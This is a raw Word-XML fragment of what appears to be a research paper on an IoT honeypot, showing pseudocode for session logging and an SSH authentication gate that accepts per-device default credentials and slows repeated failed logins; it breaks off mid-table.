              <w:t xml:space="preserve">17:                 SAVEPOINT;  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">try</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> execute(sql, params)  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">catch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">: ROLLBACK TO SAVEPOINT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">18:             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">end for</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:             COMMIT; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">break</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                       </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// on DB error: wait 1 s and retry</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">20:         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">end for</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">21:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">end while</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">22: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Session.close():</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">23:     log_event(self, "disconnect", duration)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">24:     enqueue(UPDATE sessions SET ended_at, auth_attempts, login_success, username, commands)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9019" w:name="_Toc69019"/>
      <w:r>
        <w:t xml:space="preserve">Algorithm A2 – Authentication Gate with Brute-Force Delay</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9019"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="935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5142"/>
        <w:gridCol w:w="4208"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w14:paraId="28829D87" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A2 SSH Authentication Gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A2.1 is_weak (per-device profile)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="1986AEDF" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Input:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> username, password, attacker IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Input:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> device, username, password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="077446CA" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Output:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> AUTH_SUCCESSFUL / AUTH_FAILED; auth event logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Output:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> TRUE if the pair is a default credential of that device</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="678C4C23" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5142" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">1:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> check_auth_password(user, pass):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">2:      ok ← is_weak("smartlock", user, pass)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">3:      fails ← failures[ip]        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">// shared, lock-protected</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">4:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> ok </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> fails &gt; 0 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">5:          sleep(min(0.4 × fails, 3.0 s))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">6:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">end if</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">7:      failures[ip] ← 0 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> ok </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">else</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> fails + 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">8:      session.auth(user, pass, ok)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">9:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> ok ? AUTH_SUCCESSFUL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">10:                : AUTH_FAILED</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">11: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">// Telnet: 3 tries per connection,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">12: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">//   delay 1.0 + 0.5 × attempt s</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">13: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">// HTTP: 1 s (camera), 0.8 s (lock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
